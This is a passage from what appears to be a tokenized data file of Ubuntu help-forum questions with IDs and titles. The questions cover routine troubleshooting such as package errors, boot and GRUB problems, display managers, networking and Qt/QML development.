org.eclipse.m2e.logback.configuration : eclipse.consolelog=true ! session 2014-04-26 13:24:39.103 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=3.5.0.201404011851-release-e38 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us framework arguments : -product org.springsource.sts.ide -refresh -clearpersistedstate command-line arguments : -os linux -ws gtk -arch x86_64 -product org.springsource.sts.ide -clean -refresh -debug -consolelog -clearpersistedstate ! entry org.eclipse.ui 4 4 2014-04-26 13:24:55.424 ! message unable to find view with id : com.springsource.sts.roo.ui.rooshellview , when creating perspective com.springsource.sts.ide.perspective ! entry org.eclipse.ui.workbench 2 0 2014-04-26 13:25:03.208 ! message a handler conflict occurred . this may disable some commands . ! subentry 1 org.eclipse.ui.workbench 2 0 2014-04-26 13:25:03.209 ! message conflict for 'autogen : : : org.springsource.ide.eclipse.commons.launch.actionset/org.springsource.ide.eclipse.commons.launch.relaunch.action ' : handleractivation ( commandid=autogen : : : org.springsource.ide.eclipse.commons.launch.actionset/org.springsource.ide.eclipse.commons.launch.relaunch.action , handler=actiondelegatehandlerproxy ( null , org.springsource.ide.eclipse.commons.ui.launch.stopprocesspulldowntoolbardelegate ) , expression=andexpression ( actionsetexpression ( org.springsource.ide.eclipse.commons.launch.actionset , org.eclipse.ui.internal.workbenchwindow @ 1a70ad13 ) , workbenchwindowexpression ( org.eclipse.ui.internal.workbenchwindow @ 1a70ad13 ) ) , sourcepriority=16640 ) handleractivation ( commandid=autogen : : : org.springsource.ide.eclipse.commons.launch.actionset/org.springsource.ide.eclipse.commons.launch.relaunch.action , handler=actiondelegatehandlerproxy ( null , org.springsource.ide.eclipse.commons.ui.launch.relaunchprocesspulldowntoolbardelegate ) , expression=andexpression ( actionsetexpression ( org.springsource.ide.eclipse.commons.launch.actionset , org.eclipse.ui.internal.workbenchwindow @ 1a70ad13 ) , workbenchwindowexpression ( org.eclipse.ui.internal.workbenchwindow @ 1a70ad13 ) ) , sourcepriority=16640 ) that is all . it closes and i do n't know what else can i do . do you have any idea of what seems to be the problem ?
455931	can i first install a package on ubuntu , then add its ppa ?	i am very new to ubuntu . i just installed nagios3 on ubuntu 12.04 : sudo apt-get install -y nagios3 then i remembered i to add its ppa : sudo add-apt-repository ppa : nagiosinc/ppa so if i do sudo apt-get upgrade in the future . will my nagios3 be upgraded ? thank you very much !
455932	virtualbox 4.3 on ubuntu 13.10 breaks unity and terminal	i was having some trouble seeing usb devices on my xp virtual machine running in virtual box on ubuntu 13.10 . i thought perhaps that the standard software centre 4.2 version of virtualbox might be the problem so i downloaded virtualbox 4.3 ( deb ) from the virtualbox website . i removed my 4.2 version of virtualbox and installed the downloaded 4.3 version using software centre . the software installation did n't seem to end normally . the icon for the software centre changed to a ? at the end of the installation . i thought it wise to reboot . when i rebooted my unity was gone . i just had a blank wallpaper desktop . i had to reinstall unity . my default terminal was also gone . i had to reinstall that . this is not so much a question as a warning to others to exercise caution when installing virtualbox 4.3 on ubuntu 13.10 . i have done some searching on the web and i ca n't find others who have had this specific problem but some people mention the same problem after a `` software install '' but they do n't say which software . my question is this . is virtualbox likely to have broken other stuff that i am not aware of ? is there something specific i should do ? [ edit ] i just noticed that my gvim installation also disappeared and i had to reinstall [ edit ] thanks adrian
455935	scala language not avaible ?	for another course i need the scala programming language . is it right it 's not avaible on the software center ? if that is so , what is the best way to install it . roelof
455939	how to switch between tabs with keyboard ?	how can i switch between tabs with keyboard in ubuntu ? in windows i use ctrl+tab .
455940	prevent vlc from always showing in the sound indicator	vlc , a program i use only rarely , has an entry in the sound indicator . i can remove it using dconf by following instructions from webupd8 , but each time i start up vlc , despite it being in the `` blacklisted-media-players '' section , it reappears . i also tired some things listed here , but that did n't help either . the entry `` vlc.desktop '' keeps appearing under `` interested-media-players '' : is it possible to either prevent vlc from showing up in the sound indicator menu entirely , or , preferably , only show up when i 'm actively using it ?
455942	ubuntu 14.04 lts ( onboard in login screen )	i just installed ubuntu 14.04 and everything went fine , i had 2 problems . 1- when i login , i get this annoying onboard keyboard , how can i remove it ? i tried going to it 's preferences but still . 2- everything i type on a text area ( online ) , it shows a red underline under it , even if the spelling is correct . i appreciate your help . thanks .
455943	kernel panic try to install ubuntu 12.04	trying to put ubuntu 12.04 on my hp pavili0n with window xp . it has 1 gig of ram intel pentium 4 . i get kernel error . the only way i get to boot for cd is to tap f10 . get to the install screen . it will install on restart all i get is a purple screen . i have try other thing not if i 'm doing right
455945	why ca n't my other ubuntu machines have read/write access to my samba shares , when windows machines do ?	i have a samba share set up on my server , and most of my other machines are running ubuntu . on my ubuntu machines , i end up with read-only access to my files , but windows machines can read and write . here is my smb.conf file : [ fileserver ] comment = theta shared folder path = /mnt/md0/theta browsable = yes guest ok = yes force user = nobody read only = no create mask = 0755 any help would be appreciated .
455946	upgrade from 10.10 to 13.10 without administrative privileges	i have installed ubuntu 10.10 alongside windows 7 . but now i do n't have administrator privileges in windows to delete ubuntu 10.10 . so ultimately i want to overwrite 10.10 installation with 13.10 . i also tried installing 13.10 when 10.10 was already installed , but the process freezes . any help is appreciated .
455947	how to backup drivers ?	i just wanted to know if there any very easy way to backup and restore drivers just like system restore in windows system ? i do n't want to revert back to original factory settings state . just wanted to roll back to old drivers if anything goes wrong while installing new one or updating . ( i am really missing system restore feature of windows )
455948	what is a swap partition and why is it important ?	while i was installing ubuntu 13.10 , it asked me to make a swap partition . i made it ~5.6gb , as i did n't know what it was or anything .
455952	is there a key combination similiar to windows to restart computer ?	i used to be a windows user , and when my computer froze i could press ctrl+alt+delete and it would restart the computer . is there a similar function for my current operating system ? thanks everyone .
455955	is there a way to restore everything i had before i corrupt the upgrade to ubuntu 14.04 ?	when i was upgrading to ubuntu 14.04 , i mistakenly terminated the installation window and lost everything and i corrupted the system . so , is there a way to restored the programs ( including the settings ) , files , ect ... ?
455956	can i install an older kernel version on ubuntu 14.04	i installed ubuntu 14.04 on my laptop at home , but the kernel hangs at a clocksource switching bug . would it be possible to solve this by installing an older alternative kernel together with the current one ? i am fine with reinstalling the system , just do n't want to fall back all the way to 12.04 , which worked .
455957	how do i seperate my boot partition from my storage partition ?	i have a dual-boot windows 7 and ubuntu 14.04 system . the windows partition is on my larger 1 tb hdd , but my ubuntu was installed onto my significantly smaller 32 gb ssd . without completely reinstalling the whole system , how can i create a partition on my 1 tb drive so that it becomes my default installation and storage location ? i want to make it so the ssd essentially only has the boot files , and the system knows to look to the secondary partition for any files , programs , etc . i have previously attempted to do this on older dual-boot systems , but i could not make the secondary drive the default install location . moreover , ubuntu never auto-mounted the extended partition , which sometimes made programs act up . ( this may have been a bug from the older version , so i am not too concerned about this . ) however , if i have essential programs written and executing from the secondary partition , it is critical that partition automount at start-up . i was suggested elsewhere to create a symlink to the secondary partition , but i do n't know enough about that to know if it will actually do what i want , or if it is the best way to do it . this may just be an ignorance of file structures , but any help you can offer would be greatly appreciated ! thanks , michael
455962	will i get any lag with these specs with unity on ubuntu 14.04	may receive a second hand computer : the specs are : processor : 1.6 ghz atom ram : 1gb os : windows 7 i want to know if they can run ubuntu 14.04 fluidly without unity lagging whatsoever . i want to know if desktop graphics can provide any sort of improvement . i know how to get an light weight desktop environment like lxde or similar if unity lags too much ( lagged on laptop ( 30 % cpu while doing almost nothing ) ) .
455967	why do i get an error when using apt-get ?	whenever i try to install any package using apt-get install package it shows an error massage like the one below . dpkg : dependency problems prevent configuration of unixodbc : i386 : unixodbc : i386 depends on odbcinst1debian1 ( > = 2.2.11-3 ) ; however : package odbcinst1debian1 : i386 is not installed . libodbc1 : i386 ( 2.2.14p2-5ubuntu3 ) breaks unixodbc ( < < 2.2.14p2-3 ) and is installed . version of unixodbc : i386 to be configured is 2.2.11-21. dpkg : error processing unixodbc : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : odbcinst : i386 odbcinst1debian2 : i386 unixodbc : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
455968	how to upgrade my iphone 4 to ios7 from ubuntu 14.04 ?	i want to upgrade to ios7 on my iphone 4 . is there any way i can do that without installing a virtual machine ? i currently run ubuntu 14.04 . thanks a lot !
455974	software center - no network connection - vps rdp	my download software center at my ubuntu vps server not work . button for install apps not work - add give : no network connection connect to internet to see more reviews how can i fix it ? thank you exist other topics here , but not apply to vps server
455975	14.04 dpkg found kernel : /memtest86+.bin issue	hopefully i 'm not violating any rules by opening new topic for the issue i 've encountered . trust me , i 've tried browsing all over askubuntu and bunch of other sites , but none of offered solutions have worked for me so far - hopefully you guys can help me solve the problem . earlier today i ran upgrade of my ubuntu server to 14.04 : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty i 'm having the following problem : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . if i run the command , its gets stuck at : found kernel : /memtest86+.bin please advise how to proceed ( i 've tried multiple solutions including update-grub , and plenty others , but none worked ) . $ sudo dpkg -- configure -a processing triggers for initramfs-tools ( 0.103ubuntu4 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic setting up mdadm ( 3.2.5-5ubuntu4 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing package mdadm ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mdadm after restarting my pc and running 'sudo dpkg -- configure -a ' , i 'm back to the original issue : setting up mdadm ( 3.2.5-5ubuntu4 ) ... removing any system startup links for /etc/init.d/mdadm-raid ... update-initramfs : deferring update ( trigger activated ) update-grub is /usr/sbin/update-grub searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /vmlinuz-3.13.0-24-generic found kernel : /vmlinuz-3.2.0-61-generic found kernel : /vmlinuz-3.2.0-48-generic found kernel : /vmlinuz-3.2.0-24-generic found kernel : /vmlinuz-3.0.0-12-server found kernel : /vmlinuz-2.6.28-11-server found kernel : /vmlinuz-2.6.27-14-server found kernel : /vmlinuz-2.6.24-24-server found kernel : /vmlinuz-2.6.22-16-server found kernel : /vmlinuz-2.6.22-14-server found kernel : /memtest86+.bin uname -r returns '3.13.0-24-generic' after a lot of trouble , solved by dpkg -- audit and then dpkg -- configure for packages listed
455978	how to download ubuntu onto windows xp computer	i have downloaded ubuntu onto my computer but the computer wants to use windows media player to read the file which it can not so what do i need to do ?
455980	nitro todo list app does n't appear to work in trusty ( 14.04 )	after a fresh install of 14.04 , i tried installing nitro , but the app does n't open . the launcher icon jiggles a bit when i click on it , and then stops .
455981	ubuntu 14.04 in lenovo g400 why x did not use the graphic accelerator ?	are already two or three months that i am trying to use ubuntu 14.04 and before 13.10 but do to hardware structure of my lenovo g400 intel® core™ i5-3230m cpu @ 2.60ghz × 4 and vesa : intel® sandybridge/ivybridge graphics . i am able to go upstream only with the help of grub and recovery mode because a normal boot is stopped by few flashes a black screen and after a low graphic mode window pop up blocking the normal boot and from there you can go nowhere . please give me some solution help is needed . p.s . if any kind of information is needed just give me the right key command and i will happily execute .
455983	lightdm does n't start	today when i started ubuntu , it did n't start lightdm , showing a black screen . i changed to console ctrl-alt-f1 and tried to start lightdm manually sudo start lightdm it threw me to the graphic console ( ctrl-alt-f7 ) and showed the same black screen . moreover , it looks like it starts , the console returned the number of process , lightdm start/running , process 3616 however , after sudo stop lightdm i got stop : unknown instance then i started gdm sudo start gdm and gdm started normal . so , the problem in lightdm . to solve the problem i tried to purge lightdm and reinstall it sudo apt-get purge lightdm sudo apt-get install lightdm and sudo apt-get install -- reinstall lightdm the both ways did n't help . now i use gdm , but wants to restore lightdm if it is possible . thank you all for you help ! ps : i did n't install recently any additional driver ( and have n't nvidia card at all ) . pps : some additional information $ sudo start lightdm lightdm start/running , process 2466 $ dmesg | grep lightdm [ 18.284992 ] init : lightdm main process ( 1446 ) killed by term signal [ 57.691273 ] init : lightdm main process ( 2466 ) terminated with status 1 $ sudo start lightdm lightdm start/running , process 8140 $ sudo cat /var/log/lightdm/lightdm.log [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.3 , uid=0 pid=8140 [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for automatic login as user stas [ +0.00s ] debug : starting local x display [ +0.00s ] debug : using vt 7 [ +0.00s ] debug : activating vt 7 [ +0.01s ] debug : logging to /var/log/lightdm/x-0.log [ +0.01s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.01s ] debug : launching x server [ +0.01s ] debug : launching process 8145 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.01s ] debug : waiting for ready signal from x server :0 [ +0.01s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.01s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.03s ] debug : process 8145 exited with return value 1 [ +0.03s ] debug : x server stopped [ +0.03s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +0.03s ] debug : releasing vt 7 [ +0.03s ] debug : display server stopped [ +0.03s ] debug : stopping display [ +0.03s ] debug : display stopped [ +0.03s ] debug : stopping x local seat , failed to start a display [ +0.03s ] debug : stopping seat [ +0.03s ] debug : seat stopped [ +0.03s ] debug : required seat has stopped [ +0.03s ] debug : stopping display manager [ +0.03s ] debug : display manager stopped [ +0.03s ] debug : stopping daemon [ +0.03s ] debug : exiting with return value 1 $ sudo cat x-0.log x : can not stat /etc/x11/x ( no such file or directory ) , aborting .
455987	is wubi needed or recommended for ubuntu 14.04 ?	i have not used a linux distro before , but want to give ubuntu a try . i have some knowledge about wubi . do i need wubi to install ubuntu 14.04 with windows system 7 ?
455988	how to boot ubuntu from grub rescue	after upgrading to ubuntu 14.04 , i get this error : error : symbol 'grub_term_highlight_color ' not found grub rescue > other instructions on how to deal with this seem to be no use to me because i ca n't even boot a live usb disk - i get the same error ( i have usb first in my bios boot order and have successfully booted this way in the past ) . the error even comes up if i try to enter the bios menu at boot . as far as i can tell i 'm stuck in the grub rescue prompt . so i started looking at how to boot from it and tried following these instructions grub rescue > set prefix= ( hd1,3 ) /boot/grub grub rescue > insmod linux grub rescue > linux /vmlinuz root=/dev/sdb3 ro grub rescue > initrd /initrd.img error : no such partition .
455989	how do i replace lvm root volume with ssd disk on ubuntu 13.10	i have next partitions : /dev/sda1 → /boot /dev/sda2 → luks → lvm /dev/vg1/root → / /dev/vg1/home → /home /dev/vg1/opt → /opt /dev/vg1/var → /var /dev/vg1/tmp → /tmp /dev/vg1/swap → swap /dev/sdb1 - ssd disk , currently not in use i get an ssd drive . already copy everything from `` / '' ( using lvm snapshot ) to ssd `` /dev/sdb1 '' using cp -ax … command . so , how do i make `` /dev/sdb1 '' to be root directory during os bootup with possibility to fall back to old root if needed ?
455992	is it possible to send a return code with the qt.quit ( ) signal from qml ?	i 'd like to know if it 's possible to send a return code from a pure qml application using the qt.quit ( ) signal so that qmlscene can exit with the same error code . i do n't need a solution using c++ , i just want to know if qt5.2 offers a way to close a qml app with a given error code .
455995	qml : qtquick extension plugin - what is uri ?	when starting a new qt quick extension plugin , it asks me to specify object class name ( easy enough ) , but also something called uri . what does uri stand for ? what does this project need uri for ? does my project depend on uri , or is optional ? what do its components , `` com '' . `` mycompany '' . `` qmlcomponents '' reference ? how do i configure its components to match my setup ?
455999	how to make a shell script pipe aware	i have the following script : # ! /bin/sh [ `` $ { # } '' -eq `` 0 '' ] & & ( printf `` % s\\n '' `` $ { 0 } : word ... '' > & 2 ; exit 1 ) _whats ( ) { [ -z `` $ { 1 } '' ] & & return 1 [ -z `` $ { 2 } '' ] & & more_than_one= '' 1 '' for word ; do response= '' $ ( dig +short txt $ { word } .wp.dg.cx ) '' printf `` % s\\n '' `` $ { response } '' if [ -z `` $ { more_than_one } '' ] ; then printf `` \\n % s\\n\\n '' `` : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : '' fi done } _whats `` $ { @ } '' it works great when i call it this way : whats shell\ script dns # it ouputs two definitions ( shell script and dns ) however i 'd also to call it this way : echo shell\ script dns | whats i 'm just used to it , all other unix commands can do it , how would you implement it in a shell script ?
456000	interface text missing after update	everything else is working fine , but when i restarted my computer after updating it came back with no fonts in menu bars . does anyone know what is wrong and how to fix it ?
456006	sony vaio tap 11 touchpad and mouse conflict	i have a question , which i have a partial answer to , but would like to have a full answer . and my partial answer might be helpful to others . i have just installed ubuntu 14.04 on my sony vaio tap 11 , and everything works fine , until i touch the touchpad . after that , the mouse left click does n't work any more . mouse ( i have a bluetooth microsoft sculpt mouse ) and touchpad . so basically i am left without means of left-clicking , other than touching the screen , which still works . good news is that if you do n't touch the touchpad , everything works fine . and since i do have a bluetooth mouse , i just turned off the touchpad ( there is a key for that in the keyboard/touchpad combo ) . but , i 'd like to fix that , since having a touchpad is useful . so , does anyone know anything about this bug ? and , of course , i am posting this to tell others with the same problem to switch off the touchpad , it took me several days to figure it out . thanks , sergio .
456007	cinnamon themes in ubuntu	i installed cinnamon , however , i have no idea how to access the cinnamon settings in order to install a know theme , also , how do i even install a new theme in cinnamon ?
456008	slow dns lookup after upgrading to 14.04	after upgrading my kubuntu to 14.04 from 12.04 , i got extremely slow dns lookup in firefox and thunderbird . i have checked the communications with wireshark . launching e.g . http : //vs.hu in firefox ( 28 ) , i got the following packets : no . time source destination protocol length info 1 0.000000000 192.168.1.13 192.168.1.1 dns 65 standard query 0xb406 a vs.hu no . time source destination protocol length info 2 0.013074000 192.168.1.1 192.168.1.13 dns 82 standard query response 0xb406 a 91.120.239.162 no . time source destination protocol length info 3 0.013363000 192.168.1.13 192.168.1.1 dns 65 standard query 0x7f30 aaaa vs.hu no . time source destination protocol length info 4 0.014928000 192.168.1.1 192.168.1.13 dns 110 standard query response 0x7f30 ptr vs.hu no . time source destination protocol length info 5 5.003951000 192.168.1.13 192.168.1.1 dns 65 standard query 0x1ff5 a vs.hu no . time source destination protocol length info 6 5.019617000 192.168.1.1 192.168.1.13 dns 82 standard query response 0x1ff5 a 91.120.239.162 no . time source destination protocol length info 7 5.020167000 192.168.1.13 192.168.1.1 dns 65 standard query 0xc659 aaaa vs.hu no . time source destination protocol length info 8 5.021866000 192.168.1.1 192.168.1.13 dns 110 standard query response 0xc659 ptr vs.hu no . time source destination protocol length info 9 10.008493000 192.168.1.13 91.120.239.162 tcp 74 45348 > http [ syn ] seq=0 win=29200 len=0 mss=1460 sack_perm=1 tsval=267003 tsecr=0 ws=128 it starts 1-1 query , ipv4 and ipv6 , both servers reply . then it starts this process again at 5th second . finally only at 10th seconds starts reading data from server using tcp protocol . using chrome browser , there is no problem , however it uses mdns protocol in the beginning of the communication . it can not be a hardware ( driver ) problem . same problem exists both with wired and wireless lan . moreover i started my 2nd computer ( contains kubuntu 12.04 ) with 14.04 livecd , and this problem also emerged there immediately . i have run a similar test on my 2nd computer with kubuntu 12.04 , where there is no problem with dns lookups in firefox ( 28 ) . strange , but i do not see the ipv6 query there among the packets , no repeated queries , and no delays . checking ipv6 , it is not disabled there . by the way , ping and dig reply almost immediately on 14.04 . does anybody know what is going on ? where are these 5 seconds delays from ? perhaps my router or the mozilla products hate 14.04 ? : )
456009	duplicate sources.list entry	using ubuntu 14.04 lts . sudo apt-get update thats all i ran , and it 'd start off real smooth , then it 'd get to a part where it gets stuck for like a fair ammount of time after which it 'd display this error . w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-updates/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-updates/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-updates_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-backports/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-backports/multiverse amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-backports/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-backports_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-backports/multiverse i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-backports_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-security/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-security_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ trusty-security/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-security_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems of course the suggestion it suggested isnt going to work , as it 's that very command after running which i came across the error . i 've tried creating a new sources.list file , and also , in the 'other software ' tab in the updater settings , i found two `` canonical partners '' and thus i eradicated one of them . still it wont work . there are a number of lists that the error tells of ... i checked one and couldnt make any sense out of it . also , i installed the 32bit architecture manually so as to be able to use skype
456011	403 forbidden error after copy a project in htdocs	i successfully installed xampp-linux-x64-1.8.3-4 in my ubuntu 14.04 . the xampp is installed in /opt/lampp . i get an 403 forbidden error message after i copied a html project in htdocs folder . what i did and tried : i copied the project by gksudo nautilus /opt/lampp/htdocs i tried to change the ownership of the /opt/lampp/htdocs/ to me . i changed the folder 's permissions .
456012	canon pixma ip 4850 driver problem on 14.04 64	when installing driver i get dependences problems libtiff4 missing . drivers downloaded from canon : ip4800_redhat_debian_guide.tar , including cnijfilter-common_3.40-1_amd64.deb and cnijfilterip4800series_3.40-1_amd64.deb those worked fine on earlier ubuntu , last installed on 13.10 used gdebi .
456016	14.04lts enabling bluetooth criples wifi	running 14.04 on a pavilion dm4 . wifi works fine , but as soon as i pair a bluetooth speaker the wifi comes to a screeching halt . anyone else have this issue ? ubuntu noob , so i am not sure where to even begin looking into this .
456021	remove vocals from mp3 and get only instrumentals	how can i get the instrumentals only from a file and remove the vocals ? i understand this is called karaoke .
456023	elementaryos ubuntu theme	i 'm trying to get the gtk theme that elementaryos uses working on ubuntu 14.04 but the theme is not looking the way it should . this is how it looks : rather than how it is supposed to look . what could be the issue ? why are the ubuntu ambiance-style buttons still there ?
456024	windows 7 partitions lost after installing	there was a system with dual boot windows 7 + ubuntu 12.04 . i chose option `` purge ubuntu 12.04 and install ubuntu 14.04 over '' or something like this . then i ca n't see any partitions with windows ( there were two of them ) . worse than that , bios also sees just two options with ubuntu ( and some how they are just the same ) . i have already tried boot-repair in automatic mode and he report about some errors while standard procedure of repair . results here : http : //paste.ubuntu.com/7340058/ thanks for any attention in advance .
456025	qml webview.back does not work	in qml i want to use webview , but the webview.back does not work . is there some way how to navigate , or do i have to store all the previous paths and navigate between them manualy using javascript function ?
456027	two servers using the same database files	because i do often work out of the office i have implemented a provision mechanism with the a local server , so i have a `` server '' running on my laptop and one on my computer office . all my files are stored on the cloud , so both server technically points to the same folder thus meaning my files are in sync . i 'd like to do the same with my database . on my laptop i have moved my local directory into the cloud storage , then a symbolic link has been added in the /var/lib/mysql folder to point to the remote location . at the time the configuration started , everything was fine on the laptop because the database was empty and all the data have been add from the laptop . now , i created the same symbolic link on the desktop , and the local mysql can access to the database , but this looks empty . i doubt ( and scared ) to `` import '' data as they are there and not sure what could happen on the working instance . do you know whether i have missed something ? edit : actually selecting the database , i can see nothing in phpmyadmin , but running a show tables command a list of my tables are there . thanks andrea
456028	python3 application icon	in ubuntu 13.04 , when i use the setwindowicon method in the code of my python3/pyqt4 application , it works fine , and the application icon is set properly . after upgrading to ubuntu 13.10 however , the icon is not changed anymore . why is that ?
456031	sound not working after installing 14.04 from mini cd image	i 'm working with a clean install of 14.04 , but because my usb ports are broken and i did n't have a spare dvd handy i 've installed from the mini cd image . the only problem i 've had is that the sound does n't work . i 've installed and reinstalled pulseaudio and alsa but still nothing . here is the output from my alsainfo : http : //www.alsa-project.org/db/ ? f=9d2d104a55b5bf0b0114d22fdae77aadbdd49751 i 've never really had a problem with sound on ubuntu at all , it 's always just worked , so i 've never taken the time to learn about it . what sorts of things should i be looking at in order to problem solve this ? edit : just noticed that the mixer for pulseaudio is only listing hdmi outputs and not my stereo jack output ( unsure what that output is normally listed as ) . i just tested the hdmi output and the sound can only be heard when i change the volume on the tv it 's plugged into and even then it 's glitchy . once i stop moving the volume up or down it disappears again . really strange .
456033	kubuntu 14.04 change login animation/splash screen	in kubuntu 14.04 settings there is the option for changing the login screen background , but there is no more the option to custimise the animation/splash screen after the login , while the desktop environment loads . is there any way to change/customise it like in kubuntu 12.04 ? thanks
456035	grub loader booting only ubuntu but not windows 8 ?	i have windows 8 installed in c drive ( by default from lenevo ) & ubuntu i have seperately installed in another partition . when i start my computer it leads straight to the grub loader . there i can see both options of loading ubuntu as well as loading windows 8. when i select ubuntu , it works fine but when i select windows 8 option , then it leads straight back to the grub loader itself . hence i am unable to boot into windows 8 via the grub loader ( the only way i boot into windows 8 is the one touch recovery button ) .
456036	ubuntu server losing network connection	my issue is simple , yet really complex . i recently installed ubuntu server on an old stripped down laptop . it 's a sahara le1d , 1.4 intel celeron m i think . it 's an old one , but still good . the eth0 connection is : ( from lshw -class network ) -network description : ethernet interface product : sis900 pci fast ethernet vendor : silicon integrated systems [ sis ] physical id : 4 bus info : pci @ 0000:00:04.0 logical name : eth0 version : 91 serial : 00:16:36:30:53 : ae size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sis900 driverversion=v1.08.10 apr . 2 2006 duplex=full ip=10.0.0.14 latency=173 link=yes maxlatency=11 mingnt=52 multicast=yes port=mii speed=100mbit/s resources : irq:19 ioport:1800 ( size=256 ) memory : e4003000-e4003fff memory:30020000-3003ffff the problem is this . the network drops after a while , but only if i have my deluge client running and i am not sshed into the server . the server is serving up two websites and the web-client for deluge . but after starting a torrent , after a while the network drops and i ca n't ssh into it or see the websites . if i then press a key on the connected keyboard , the network jumps right back into life . however the server is n't sleeping . it 's still definitely on . i 've tried the ping thing , denoted by faulty hardware thinking the network is inactive ( which is n't an issue since a torrent is running ) , and i 've tried looking in dmesg and syslog , kern.log too , but nothing that i can make sense of . any ideas ? i 'd really like my server to not disconnect when torrenting , but my bigger worry is if its generally unstable , it may not only be torrents that cause it . it has n't been up for a long time . it 's running ubuntu server 32bit 14.04 . edit 1 : i have concluded that having ssh open changes nothing . it still closes access to the server after some time . here 's something from dmesg : [ 19.662131 ] type=1400 audit ( 1398606232.597:5 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=426 comm= '' apparmor_parser '' [ 19.662146 ] type=1400 audit ( 1398606232.597:6 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=426 comm= '' apparmor_parser '' [ 19.662663 ] type=1400 audit ( 1398606232.597:7 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=426 comm= '' apparmor_parser '' [ 19.664390 ] type=1400 audit ( 1398606232.601:8 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /sbin/dhclient '' pid=427 comm= '' apparmor_parser '' [ 19.664409 ] type=1400 audit ( 1398606232.601:9 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=427 comm= '' apparmor_parser '' [ 19.664419 ] type=1400 audit ( 1398606232.601:10 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=427 comm= '' apparmor_parser '' [ 19.665437 ] type=1400 audit ( 1398606232.601:11 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=427 comm= '' apparmor_parser '' [ 24.542312 ] init : cups main process ( 621 ) killed by hup signal [ 24.542340 ] init : cups main process ended , respawning [ 26.736358 ] eth0 : media link off [ 31.746038 ] eth0 : media link on 100mbps full-duplex [ 33.609808 ] init : udev-fallback-graphics main process ( 673 ) terminated with status 1 [ 40.667068 ] init : samba-ad-dc main process ( 685 ) terminated with status 1 [ 41.165841 ] init : failsafe main process ( 492 ) killed by term signal [ 42.033077 ] audit_printk_skb : 15 callbacks suppressed [ 42.033087 ] type=1400 audit ( 